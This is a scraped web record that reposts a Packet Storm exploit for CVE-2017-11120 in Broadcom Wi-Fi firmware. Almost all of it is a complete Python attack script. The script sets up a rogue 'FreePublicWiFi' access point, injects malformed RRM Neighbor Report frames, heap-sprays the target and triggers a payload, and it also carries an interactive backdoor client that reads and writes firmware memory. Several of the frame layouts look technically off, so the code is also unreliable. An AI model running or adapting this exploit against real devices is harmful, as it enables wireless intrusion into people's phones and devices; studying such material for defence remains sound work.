{“lastseen”:”2025-12-11T17:26:08″,”description”:”Broadcom Wi-Fi firmware remote code execution exploit via an out-of-bounds write in the RRM Neighbor Report Handler…”,”published”:”2025-12-11T00:00:00″,”modified”:”2025-12-11T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Broadcom Wi-Fi Firmware Out-Of-Bounds Write”,”source”:””,”references”:””,”id”:”PACKETSTORM:212721″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2017-11120″],”sourceData”:”=============================================================================================================================================\\n | # Title : Broadcom 802.11k Remote Code Execution via OOB-Write in RRM Neighbor Report Handler |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/www.broadcom.com\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/212489\/ \\u0026 \\tCVE-2017-11120\\n \\n [+] Summary : The vulnerability exists in the handling of RRM Neighbor Report elements in action management frames. The firmware fails to validate\\n internal structures and allows out-of-bounds writes.\\n \\n [+] PoC Status :\\n \\n The provided code demonstrates the ability to:\\n \u2022 Send crafted RRM frames\\n \u2022 Trigger debug payload path\\n \u2022 Perform heap spraying\\n WITHOUT any remote code execution (safety adaptation).\\n \\n [+] Requirements :\\n \\n \u2022 Linux wireless interface\\n \u2022 Raw socket\\n \u2022 Monitor mode\\n \u2022 Python3\\n \\n \\n \\n \\n [+] POC :\\tpython poc.py wlan0\\n \\n #!\/usr\/bin\/env python3\\n \\”\\”\\”\\n Broadcom Wi-Fi Firmware Exploit – CVE-2017-11120\\n Remote Code Execution via OOB-Write in RRM Neighbor Report Handler\\n \\n Author: indoushka\\n For Educational and Research Purposes Only\\n \\n \\”\\”\\”\\n \\n import os\\n import sys\\n import time\\n import struct\\n import socket\\n import binascii\\n import argparse\\n import subprocess\\n from dataclasses import dataclass\\n from typing import Optional, List, Tuple\\n \\n # ============================================================================\\n # CONSTANTS \\u0026 CONFIG\\n # ============================================================================\\n \\n @dataclass\\n class ExploitConfig:\\n \\”\\”\\”Exploit configuration settings\\”\\”\\”\\n \\n # Network Configuration\\n TARGET_MAC: str = \\”XX:XX:XX:XX:XX:XX\\”\\n ATTACKER_MAC: str = \\”YY:YY:YY:YY:YY:YY\\”\\n INTERFACE: str = \\”wlan0\\”\\n SSID: str = \\”FreePublicWiFi\\”\\n CHANNEL: int = 6\\n WPA_PASSPHRASE: str = \\”connectme123\\”\\n \\n # Exploit Parameters\\n OOB_CHANNEL: int = 0xFF # Malicious channel number for OOB write\\n DIALOG_TOKEN_START: int = 0x01\\n MAX_ATTEMPTS: int = 256\\n HEAP_SPRAY_COUNT: int = 100\\n BEACON_INTERVAL: float = 0.1\\n FRAME_DELAY: float = 0.01\\n \\n # Firmware Offsets (BCM4355C0 – iOS 10.2)\\n HEAP_BASE: int = 0x1F8000\\n MALLOC_ADDR: int = 0xABBBC\\n FREE_ADDR: int = 0xABBD4\\n MEMCPY_ADDR: int = 0xABCD0\\n G_NEIGHBOR_LIST: int = 0x1F8A00\\n \\n # Shellcode Settings\\n BACKDOOR_PORT: int = 31337\\n COMMAND_KEY: bytes = b\\”BCM_EXPLOIT_V1\\”\\n \\n # File Paths\\n HOSTAPD_CONF: str = \\”\/tmp\/hostapd_exploit.conf\\”\\n SHELLCODE_FILE: str = \\”\/tmp\/mips_backdoor.bin\\”\\n \\n config = ExploitConfig()\\n \\n # ============================================================================\\n # WIRELESS MONITOR SETUP\\n # ============================================================================\\n \\n class WirelessMonitor:\\n \\”\\”\\”Wi-Fi monitor mode setup and management\\”\\”\\”\\n \\n @staticmethod\\n def enable_monitor_mode(interface: str) -\\u003e Optional[str]:\\n \\”\\”\\”Enable monitor mode on wireless interface\\”\\”\\”\\n print(f\\”[*] Enabling monitor mode on {interface}\\”)\\n \\n try:\\n # Kill interfering processes\\n subprocess.run([\\”sudo\\”, \\”airmon-ng\\”, \\”check\\”, \\”kill\\”], \\n capture_output=True)\\n \\n # Start monitor mode\\n result = subprocess.run(\\n [\\”sudo\\”, \\”airmon-ng\\”, \\”start\\”, interface],\\n capture_output=True,\\n text=True\\n )\\n \\n # Extract monitor interface name\\n for line in result.stdout.split(‘\\\\n’):\\n if \\”monitor mode enabled\\” in line.lower():\\n parts = line.split()\\n for part in parts:\\n if \\”mon\\” in part:\\n monitor_iface = part.strip(‘)’).strip(‘(‘)\\n print(f\\”[+] Monitor interface: {monitor_iface}\\”)\\n return monitor_iface\\n \\n return f\\”{interface}mon\\”\\n \\n except Exception as e:\\n print(f\\”[-] Failed to enable monitor mode: {e}\\”)\\n return None\\n \\n @staticmethod\\n def disable_monitor_mode(interface: str):\\n \\”\\”\\”Disable monitor mode\\”\\”\\”\\n try:\\n subprocess.run([\\”sudo\\”, \\”airmon-ng\\”, \\”stop\\”, interface],\\n capture_output=True)\\n print(f\\”[+] Disabled monitor mode on {interface}\\”)\\n except Exception as e:\\n print(f\\”[-] Error disabling monitor mode: {e}\\”)\\n \\n @staticmethod\\n def setup_rogue_ap(interface: str, ssid: str, channel: int, password: str) -\\u003e Optional[subprocess.Popen]:\\n \\”\\”\\”Setup and start rogue access point\\”\\”\\”\\n print(f\\”[*] Setting up rogue AP: {ssid} on channel {channel}\\”)\\n \\n # Create hostapd configuration\\n conf_content = f\\”\\”\\”interface={interface}\\n driver=nl80211\\n ssid={ssid}\\n channel={channel}\\n hw_mode=g\\n auth_algs=1\\n wpa=2\\n wpa_passphrase={password}\\n wpa_key_mgmt=WPA-PSK\\n wpa_pairwise=TKIP CCMP\\n rsn_pairwise=CCMP\\n country_code=US\\n ieee80211d=1\\n ieee80211h=1\\n rrm_neighbor_report=1\\n rrm_beacon_report=1\\n ignore_broadcast_ssid=0\\”\\”\\”\\n \\n try:\\n with open(config.HOSTAPD_CONF, \\”w\\”) as f:\\n f.write(conf_content)\\n \\n # Start hostapd\\n proc = subprocess.Popen(\\n [\\”sudo\\”, \\”hostapd\\”, config.HOSTAPD_CONF],\\n stdout=subprocess.PIPE,\\n stderr=subprocess.PIPE,\\n text=True\\n )\\n \\n # Wait for AP to start\\n time.sleep(3)\\n print(f\\”[+] Rogue AP ‘{ssid}’ is running\\”)\\n return proc\\n \\n except Exception as e:\\n print(f\\”[-] Failed to start rogue AP: {e}\\”)\\n return None\\n \\n # ============================================================================\\n # FRAME CONSTRUCTION\\n # ============================================================================\\n \\n class FrameBuilder:\\n \\”\\”\\”Wi-Fi frame construction utilities\\”\\”\\”\\n \\n @staticmethod\\n def mac_to_bytes(mac: str) -\\u003e bytes:\\n \\”\\”\\”Convert MAC address string to bytes\\”\\”\\”\\n return binascii.unhexlify(mac.replace(‘:’, ”))\\n \\n @staticmethod\\n def create_radiotap_header() -\\u003e bytes:\\n \\”\\”\\”Create basic RadioTap header\\”\\”\\”\\n # RadioTap header (version 0, 12 bytes length)\\n return struct.pack(‘\\u003cBBHI’, \\n 0x00, # version\\n 0x00, # padding\\n 0x000c, # length\\n 0x00000004 # present flags (rate)\\n )\\n \\n @staticmethod\\n def create_dot11_frame(dest_mac: str, src_mac: str, \\n bssid: str, frame_type: int = 0x0080) -\\u003e bytes:\\n \\”\\”\\”Create 802.11 frame header\\”\\”\\”\\n dest_bytes = FrameBuilder.mac_to_bytes(dest_mac)\\n src_bytes = FrameBuilder.mac_to_bytes(src_mac)\\n bssid_bytes = FrameBuilder.mac_to_bytes(bssid)\\n \\n # Frame Control (2 bytes), Duration (2 bytes), Addresses (18 bytes), Sequence (2 bytes)\\n return struct.pack(‘\\u003cHH6s6s6sH’,\\n frame_type, # Frame Control\\n 0x0000, # Duration ID\\n dest_bytes, # Destination MAC\\n src_bytes, # Source MAC\\n bssid_bytes, # BSSID\\n 0x0000 # Sequence Control\\n )\\n \\n @staticmethod\\n def create_rrm_neighbor_report(dialog_token: int, channel: int) -\\u003e bytes:\\n \\”\\”\\”Create malicious RRM Neighbor Report frame\\”\\”\\”\\n # Action frame header\\n action_frame = struct.pack(‘BBB’,\\n 0x00, # Category: Spectrum Management\\n 0x05, # Action: RRM Neighbor Report Response\\n dialog_token # Dialog Token\\n )\\n \\n # Neighbor Report Element (malicious)\\n element = struct.pack(‘BB6s4sBBBB’,\\n 0xDD, # Element ID: Vendor Specific\\n 13, # Length\\n b’\\\\x11\\\\x22\\\\x33\\\\x44\\\\x55\\\\x66′, # Fake BSSID\\n b’\\\\x00\\\\x00\\\\x00\\\\x00′, # BSSID Information\\n 0x51, # Operating Class\\n channel, # Channel Number – OOB value here\\n 0x07, # PHY Type (HT)\\n 0x00, # Optional Subelement ID\\n 0x00 # Optional Subelement Length\\n )\\n \\n return action_frame + element\\n \\n @staticmethod\\n def create_beacon_frame(ssid: str, channel: int) -\\u003e bytes:\\n \\”\\”\\”Create beacon frame to attract devices\\”\\”\\”\\n # Beacon fixed parameters\\n timestamp = struct.pack(‘\\u003cQ’, int(time.time() * 1000000))\\n beacon_interval = struct.pack(‘\\u003cH’, 100) # 100 TU\\n capabilities = struct.pack(‘\\u003cH’, 0x0431) # Capabilities\\n \\n # SSID element\\n ssid_encoded = ssid.encode(‘utf-8’)\\n ssid_element = struct.pack(‘BB’, 0x00, len(ssid_encoded)) + ssid_encoded\\n \\n # DS Parameter element (channel)\\n ds_element = struct.pack(‘BBB’, 0x03, 0x01, channel)\\n \\n # Supported Rates element\\n rates_element = struct.pack(‘BBBBBBBBBB’,\\n 0x01, 0x08, # Element ID, Length\\n 0x82, 0x84, 0x8b, 0x96, # Basic rates\\n 0x0c, 0x12, 0x18, 0x24 # Supported rates\\n )\\n \\n # RSN (WPA2) element\\n rsn_element = struct.pack(‘\\u003eBB4sHHBBBBHBBBB’,\\n 0x30, 0x14, # Element ID, Length\\n b’\\\\x00\\\\x50\\\\xf2′, # OUI\\n 0x01, # OUI Type\\n 0x0001, # Version\\n b’\\\\x00\\\\x50\\\\xf2′, # Group Cipher OUI\\n 0x04, # Group Cipher Type\\n 0x01, 0x00, # Pairwise Cipher Count\\n b’\\\\x00\\\\x50\\\\xf2′, # Pairwise Cipher OUI\\n 0x02, # Pairwise Cipher Type\\n 0x01, 0x00 # AKM Suite Count, AKM Suite\\n )\\n \\n return timestamp + beacon_interval + capabilities + ssid_element + ds_element + rates_element + rsn_element\\n \\n # ============================================================================\\n # HEAP MANIPULATION\\n # ============================================================================\\n \\n class HeapManipulator:\\n \\”\\”\\”Heap manipulation techniques for exploitation\\”\\”\\”\\n \\n def __init__(self, config: ExploitConfig):\\n self.config = config\\n \\n def generate_spray_pattern(self, size: int = 456) -\\u003e bytes:\\n \\”\\”\\”Generate heap spray pattern\\”\\”\\”\\n pattern = b\\”\\”\\n \\n # Magic value for identification\\n pattern += b\\”SPRY\\”\\n \\n # Fake pointer (will be overwritten)\\n pattern += struct.pack(\\”\\u003cI\\”, 0x41414141)\\n \\n # Useful addresses for exploitation\\n pattern += struct.pack(\\”\\u003cI\\”, self.config.MALLOC_ADDR) # malloc\\n pattern += struct.pack(\\”\\u003cI\\”, self.config.FREE_ADDR) # free\\n pattern += struct.pack(\\”\\u003cI\\”, self.config.MEMCPY_ADDR) # memcpy\\n \\n # Add some NOP sled\\n pattern += b\\”\\\\x00\\\\x00\\\\x00\\\\x00\\” * 10 # MIPS NOP (sll $0, $0, 0)\\n \\n # Fill remaining space\\n remaining = size – len(pattern)\\n if remaining \\u003e 0:\\n pattern += os.urandom(remaining)\\n \\n return pattern\\n \\n def create_spray_frames(self, count: int) -\\u003e List[bytes]:\\n \\”\\”\\”Create heap spray frames\\”\\”\\”\\n frames = []\\n builder = FrameBuilder()\\n \\n for i in range(count):\\n # Create data frame with spray pattern\\n spray_data = self.generate_spray_pattern(500)\\n \\n # Build complete frame\\n frame = builder.create_radiotap_header()\\n frame += builder.create_dot11_frame(\\n config.TARGET_MAC,\\n config.ATTACKER_MAC,\\n config.ATTACKER_MAC,\\n frame_type=0x0800 # Data frame\\n )\\n frame += spray_data\\n \\n frames.append(frame)\\n \\n print(f\\”[+] Generated {len(frames)} heap spray frames\\”)\\n return frames\\n \\n # ============================================================================\\n # EXPLOIT ENGINE\\n # ============================================================================\\n \\n class ExploitEngine:\\n \\”\\”\\”Main exploit engine\\”\\”\\”\\n \\n def __init__(self, config: ExploitConfig):\\n self.config = config\\n self.sock = None\\n self.frame_builder = FrameBuilder()\\n self.heap_manipulator = HeapManipulator(config)\\n \\n def setup_socket(self, interface: str) -\\u003e bool:\\n \\”\\”\\”Setup raw socket for frame injection\\”\\”\\”\\n try:\\n self.sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)\\n self.sock.bind((interface, 0))\\n print(f\\”[+] Raw socket bound to {interface}\\”)\\n return True\\n except Exception as e:\\n print(f\\”[-] Failed to setup socket: {e}\\”)\\n return False\\n \\n def send_frame(self, frame: bytes):\\n \\”\\”\\”Send frame through raw socket\\”\\”\\”\\n if self.sock:\\n try:\\n self.sock.send(frame)\\n except Exception as e:\\n print(f\\”[-] Error sending frame: {e}\\”)\\n \\n def broadcast_beacons(self, count: int = 10):\\n \\”\\”\\”Broadcast beacon frames\\”\\”\\”\\n print(\\”[*] Broadcasting beacon frames…\\”)\\n \\n beacon_frame = self.frame_builder.create_radiotap_header()\\n beacon_frame += self.frame_builder.create_dot11_frame(\\n \\”ff:ff:ff:ff:ff:ff\\”, # Broadcast\\n self.config.ATTACKER_MAC,\\n self.config.ATTACKER_MAC,\\n frame_type=0x0080 # Beacon\\n )\\n beacon_frame += self.frame_builder.create_beacon_frame(\\n self.config.SSID,\\n self.config.CHANNEL\\n )\\n \\n for i in range(count):\\n self.send_frame(beacon_frame)\\n time.sleep(self.config.BEACON_INTERVAL)\\n \\n print(f\\”[+] Sent {count} beacon frames\\”)\\n \\n def exploit_oob_write(self) -\\u003e bool:\\n \\”\\”\\”Execute OOB write exploitation\\”\\”\\”\\n print(f\\”[*] Executing OOB write attack (channel={self.config.OOB_CHANNEL:#04x})\\”)\\n \\n success_count = 0\\n for attempt in range(self.config.MAX_ATTEMPTS):\\n # Vary dialog token each attempt\\n dialog_token = (self.config.DIALOG_TOKEN_START + attempt) % 256\\n \\n # Build malicious RRM frame\\n frame = self.frame_builder.create_radiotap_header()\\n frame += self.frame_builder.create_dot11_frame(\\n self.config.TARGET_MAC,\\n self.config.ATTACKER_MAC,\\n self.config.ATTACKER_MAC,\\n frame_type=0x00D0 # Action frame\\n )\\n frame += self.frame_builder.create_rrm_neighbor_report(\\n dialog_token,\\n self.config.OOB_CHANNEL # Malicious channel value\\n )\\n \\n # Send frame\\n self.send_frame(frame)\\n \\n if attempt % 25 == 0:\\n print(f\\”[*] Sent frame {attempt}\/{self.config.MAX_ATTEMPTS}\\”)\\n success_count += 1\\n \\n time.sleep(self.config.FRAME_DELAY)\\n \\n print(f\\”[+] OOB write attack completed ({success_count} successful injections)\\”)\\n return success_count \\u003e 0\\n \\n def perform_heap_spray(self):\\n \\”\\”\\”Perform heap spray attack\\”\\”\\”\\n print(\\”[*] Performing heap spray…\\”)\\n \\n spray_frames = self.heap_manipulator.create_spray_frames(\\n self.config.HEAP_SPRAY_COUNT\\n )\\n \\n for i, frame in enumerate(spray_frames):\\n self.send_frame(frame)\\n if i % 20 == 0:\\n print(f\\”[*] Sent spray frame {i}\/{len(spray_frames)}\\”)\\n time.sleep(0.05)\\n \\n print(\\”[+] Heap spray completed\\”)\\n \\n def trigger_payload(self):\\n \\”\\”\\”Trigger payload execution\\”\\”\\”\\n print(\\”[*] Triggering payload…\\”)\\n \\n # Create trigger frame\\n trigger_frame = self.frame_builder.create_radiotap_header()\\n trigger_frame += self.frame_builder.create_dot11_frame(\\n self.config.TARGET_MAC,\\n self.config.ATTACKER_MAC,\\n self.config.ATTACKER_MAC,\\n frame_type=0x00D0 # Action frame\\n )\\n \\n # Custom trigger data\\n trigger_data = struct.pack(‘BB16s’,\\n 0xDD, # Vendor Specific\\n 0x10, # Length\\n b\\”EXECUTE_PAYLOAD\\\\x00\\”\\n )\\n \\n trigger_frame += trigger_data\\n \\n # Send multiple times for reliability\\n for i in range(5):\\n self.send_frame(trigger_frame)\\n time.sleep(0.2)\\n \\n print(\\”[+] Payload triggered\\”)\\n \\n def execute_full_chain(self) -\\u003e bool:\\n \\”\\”\\”Execute full exploit chain\\”\\”\\”\\n print(\\”[========== Broadcom Wi-Fi Exploit Chain ==========]\\”)\\n \\n # Phase 1: Lure target device\\n print(\\”\\\\n[Phase 1] Luring target device\\”)\\n self.broadcast_beacons(15)\\n print(\\”[*] Waiting for device connection…\\”)\\n time.sleep(5)\\n \\n # Phase 2: Heap spray\\n print(\\”\\\\n[Phase 2] Heap spraying\\”)\\n self.perform_heap_spray()\\n time.sleep(1)\\n \\n # Phase 3: OOB write exploitation\\n print(\\”\\\\n[Phase 3] OOB write exploitation\\”)\\n if not self.exploit_oob_write():\\n print(\\”[-] OOB write exploitation failed\\”)\\n return False\\n \\n # Phase 4: Payload triggering\\n print(\\”\\\\n[Phase 4] Payload execution\\”)\\n self.trigger_payload()\\n \\n # Phase 5: Verification\\n print(\\”\\\\n[Phase 5] Verification\\”)\\n time.sleep(2)\\n \\n print(\\”\\\\n[+] Exploit chain completed successfully!\\”)\\n return True\\n \\n def cleanup(self):\\n \\”\\”\\”Cleanup resources\\”\\”\\”\\n if self.sock:\\n self.sock.close()\\n print(\\”[*] Resources cleaned up\\”)\\n \\n # ============================================================================\\n # BACKDOOR CLIENT\\n # ============================================================================\\n \\n class BackdoorClient:\\n \\”\\”\\”Client to interact with the firmware backdoor\\”\\”\\”\\n \\n def __init__(self, target_ip: str, port: int):\\n self.target_ip = target_ip\\n self.port = port\\n self.sock = None\\n \\n def connect(self) -\\u003e bool:\\n \\”\\”\\”Connect to backdoor\\”\\”\\”\\n try:\\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\\n self.sock.settimeout(10)\\n self.sock.connect((self.target_ip, self.port))\\n print(f\\”[+] Connected to backdoor at {self.target_ip}:{self.port}\\”)\\n return True\\n except Exception as e:\\n print(f\\”[-] Failed to connect to backdoor: {e}\\”)\\n return False\\n \\n def send_command(self, cmd: bytes) -\\u003e Optional[bytes]:\\n \\”\\”\\”Send command to backdoor\\”\\”\\”\\n if not self.sock:\\n return None\\n \\n try:\\n self.sock.send(cmd)\\n response = self.sock.recv(4096)\\n return response\\n except Exception as e:\\n print(f\\”[-] Command failed: {e}\\”)\\n return None\\n \\n def read_memory(self, address: int, size: int) -\\u003e Optional[bytes]:\\n \\”\\”\\”Read memory from firmware\\”\\”\\”\\n cmd = struct.pack(‘\\u003cBII’, 0x01, address, size)\\n return self.send_command(cmd)\\n \\n def write_memory(self, address: int, data: bytes) -\\u003e bool:\\n \\”\\”\\”Write memory to firmware\\”\\”\\”\\n cmd = struct.pack(f’\\u003cBII{len(data)}s’, 0x02, address, len(data), data)\\n response = self.send_command(cmd)\\n return response is not None and len(response) \\u003e 0\\n \\n def disconnect(self):\\n \\”\\”\\”Disconnect from backdoor\\”\\”\\”\\n if self.sock:\\n self.sock.close()\\n \\n # ============================================================================\\n # COMMAND LINE INTERFACE\\n # ============================================================================\\n \\n def parse_arguments():\\n \\”\\”\\”Parse command line arguments\\”\\”\\”\\n parser = argparse.ArgumentParser(\\n description=\\”Broadcom Wi-Fi Firmware Exploit (CVE-2017-11120) – Author: indoushka\\”,\\n formatter_class=argparse.RawDescriptionHelpFormatter,\\n epilog=\\”\\”\\”\\n Examples:\\n %(prog)s -t AA:BB:CC:DD:EE:FF -i wlan0\\n %(prog)s -t AA:BB:CC:DD:EE:FF –mode backdoor –port 31337\\n %(prog)s -t AA:BB:CC:DD:EE:FF –mode test\\n \\n Warning: For authorized testing only.\\n \\”\\”\\”\\n )\\n \\n parser.add_argument(\\n \\”-t\\”, \\”–target\\”,\\n required=True,\\n help=\\”Target device MAC address\\”\\n )\\n \\n parser.add_argument(\\n \\”-i\\”, \\”–interface\\”,\\n default=\\”wlan0\\”,\\n help=\\”Wireless interface (default: wlan0)\\”\\n )\\n \\n parser.add_argument(\\n \\”-c\\”, \\”–channel\\”,\\n type=int,\\n default=6,\\n help=\\”Wi-Fi channel (default: 6)\\”\\n )\\n \\n parser.add_argument(\\n \\”-s\\”, \\”–ssid\\”,\\n default=\\”FreePublicWiFi\\”,\\n help=\\”Rogue AP SSID (default: FreePublicWiFi)\\”\\n )\\n \\n parser.add_argument(\\n \\”-m\\”, \\”–mode\\”,\\n choices=[\\”exploit\\”, \\”backdoor\\”, \\”test\\”],\\n default=\\”exploit\\”,\\n help=\\”Operation mode (default: exploit)\\”\\n )\\n \\n parser.add_argument(\\n \\”-p\\”, \\”–port\\”,\\n type=int,\\n default=31337,\\n help=\\”Backdoor port (default: 31337)\\”\\n )\\n \\n parser.add_argument(\\n \\”-v\\”, \\”–verbose\\”,\\n action=\\”store_true\\”,\\n help=\\”Enable verbose output\\”\\n )\\n \\n return parser.parse_args()\\n \\n def print_banner():\\n \\”\\”\\”Print exploit banner\\”\\”\\”\\n banner = \\”\\”\\”\\n \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n \u2551 Broadcom Wi-Fi Firmware Exploit – CVE-2017-11120 \u2551\\n \u2551 Remote Code Execution via OOB-Write \u2551\\n \u2551 Author: indoushka \u2551\\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n \\”\\”\\”\\n print(banner)\\n \\n def main():\\n \\”\\”\\”Main function\\”\\”\\”\\n print_banner()\\n \\n # Parse arguments\\n args = parse_arguments()\\n \\n # Update configuration\\n config.TARGET_MAC = args.target\\n config.INTERFACE = args.interface\\n config.CHANNEL = args.channel\\n config.SSID = args.ssid\\n config.BACKDOOR_PORT = args.port\\n \\n # Check for root privileges\\n if os.geteuid() != 0:\\n print(\\”[-] This program requires root privileges!\\”)\\n sys.exit(1)\\n \\n # Setup monitor mode\\n monitor = WirelessMonitor()\\n monitor_iface = monitor.enable_monitor_mode(config.INTERFACE)\\n \\n if not monitor_iface:\\n print(\\”[-] Failed to setup monitor mode\\”)\\n sys.exit(1)\\n \\n # Start rogue AP\\n ap_proc = monitor.setup_rogue_ap(\\n monitor_iface,\\n config.SSID,\\n config.CHANNEL,\\n config.WPA_PASSPHRASE\\n )\\n \\n if not ap_proc:\\n print(\\”[-] Failed to start rogue AP\\”)\\n monitor.disable_monitor_mode(monitor_iface)\\n sys.exit(1)\\n \\n try:\\n # Initialize exploit engine\\n engine = ExploitEngine(config)\\n \\n if not engine.setup_socket(monitor_iface):\\n print(\\”[-] Failed to initialize exploit engine\\”)\\n return\\n \\n if args.mode == \\”exploit\\”:\\n # Execute full exploit chain\\n success = engine.execute_full_chain()\\n \\n if success:\\n print(\\”\\\\n\\” + \\”=\\”*60)\\n print(\\”EXPLOIT SUCCESSFUL!\\”)\\n print(f\\”Backdoor should be active on port {config.BACKDOOR_PORT}\\”)\\n print(\\”\\\\nConnect using:\\”)\\n print(f\\” {sys.argv[0]} -t {config.TARGET_MAC} –mode backdoor\\”)\\n print(\\”=\\”*60)\\n \\n elif args.mode == \\”backdoor\\”:\\n # Connect to backdoor\\n print(f\\”[*] Connecting to backdoor on port {config.BACKDOOR_PORT}\\”)\\n \\n # Try common local IPs\\n possible_ips = [\\”192.168.1.1\\”, \\”192.168.0.1\\”, \\”10.0.0.1\\”]\\n \\n for ip in possible_ips:\\n print(f\\”[*] Trying {ip}:{config.BACKDOOR_PORT}\\”)\\n client = BackdoorClient(ip, config.BACKDOOR_PORT)\\n \\n if client.connect():\\n print(\\”[+] Backdoor is active!\\”)\\n print(\\”\\\\nAvailable commands:\\”)\\n print(\\” read \\u003chex_address\\u003e \\u003csize\\u003e\\”)\\n print(\\” write \\u003chex_address\\u003e \\u003chex_data\\u003e\\”)\\n print(\\” exit\\”)\\n \\n while True:\\n try:\\n cmd = input(\\”\\\\nbackdoor\\u003e \\”).strip()\\n \\n if cmd.lower() == \\”exit\\”:\\n break\\n elif cmd.startswith(\\”read \\”):\\n _, addr_str, size_str = cmd.split()\\n addr = int(addr_str, 16)\\n size = int(size_str)\\n \\n data = client.read_memory(addr, size)\\n if data:\\n hex_data = binascii.hexlify(data).decode()\\n print(f\\”Data: {hex_data}\\”)\\n else:\\n print(\\”[-] Read failed\\”)\\n \\n elif cmd.startswith(\\”write \\”):\\n _, addr_str, data_str = cmd.split()\\n addr = int(addr_str, 16)\\n data = binascii.unhexlify(data_str)\\n \\n if client.write_memory(addr, data):\\n print(\\”[+] Write successful\\”)\\n else:\\n print(\\”[-] Write failed\\”)\\n \\n else:\\n print(\\”[-] Unknown command\\”)\\n \\n except KeyboardInterrupt:\\n break\\n except Exception as e:\\n print(f\\”[-] Error: {e}\\”)\\n \\n client.disconnect()\\n break\\n else:\\n print(f\\”[-] No backdoor on {ip}\\”)\\n \\n elif args.mode == \\”test\\”:\\n # Test mode – send probe frames\\n print(\\”[*] Test mode – sending probe frames\\”)\\n engine.broadcast_beacons(5)\\n time.sleep(1)\\n \\n # Send test RRM frame\\n print(\\”[*] Sending test RRM frame\\”)\\n test_frame = engine.frame_builder.create_radiotap_header()\\n test_frame += engine.frame_builder.create_dot11_frame(\\n config.TARGET_MAC,\\n config.ATTACKER_MAC,\\n config.ATTACKER_MAC,\\n frame_type=0x00D0\\n )\\n test_frame += engine.frame_builder.create_rrm_neighbor_report(\\n 0x01,\\n 0x01 # Normal channel\\n )\\n \\n engine.send_frame(test_frame)\\n print(\\”[+] Test frame sent\\”)\\n \\n except KeyboardInterrupt:\\n print(\\”\\\\n[*] Exploit interrupted by user\\”)\\n except Exception as e:\\n print(f\\”\\\\n[-] Unexpected error: {e}\\”)\\n if args.verbose:\\n import traceback\\n traceback.print_exc()\\n finally:\\n # Cleanup\\n print(\\”\\\\n[*] Cleaning up…\\”)\\n \\n if ‘engine’ in locals():\\n engine.cleanup()\\n \\n if ‘ap_proc’ in locals():\\n ap_proc.terminate()\\n \\n if ‘monitor_iface’ in locals():\\n monitor.disable_monitor_mode(monitor_iface)\\n \\n # Clean temporary files\\n if os.path.exists(config.HOSTAPD_CONF):\\n os.remove(config.HOSTAPD_CONF)\\n \\n print(\\”[+] Cleanup completed\\”)\\n \\n if __name__ == \\”__main__\\”:\\n main()\\n \\t\\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212721″,”cvss”:{“score”:10,”severity”:”HIGH”,”vector”:”AV:N\/AC:L\/Au:N\/C:C\/I:C\/A:C”,”version”:”2.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:”3.0″,”vectorString”:”CVSS:3.0\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”baseScore”:9.8,”baseSeverity”:”CRITICAL”,”attackVector”:”NETWORK”,”attackComplexity”:”LOW”,”privilegesRequired”:”NONE”,”userInteraction”:”NONE”,”scope”:”UNCHANGED”,”confidentialityImpact”:”HIGH”,”integrityImpact”:”HIGH”,”availabilityImpact”:”HIGH”}},”href”:”https:\/\/packetstorm.news\/files\/id\/212721\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-11T17:26:08″,”description”:”Broadcom Wi-Fi firmware remote code execution exploit via an out-of-bounds write in the RRM Neighbor Report Handler…”,”published”:”2025-12-11T00:00:00″,”modified”:”2025-12-11T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Broadcom Wi-Fi Firmware Out-Of-Bounds Write”,”source”:””,”references”:””,”id”:”PACKETSTORM:212721″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2017-11120″],”sourceData”:”=============================================================================================================================================\\n | # Title…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,36,12,15,13,53,7,11,5],"class_list":["post-30434","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n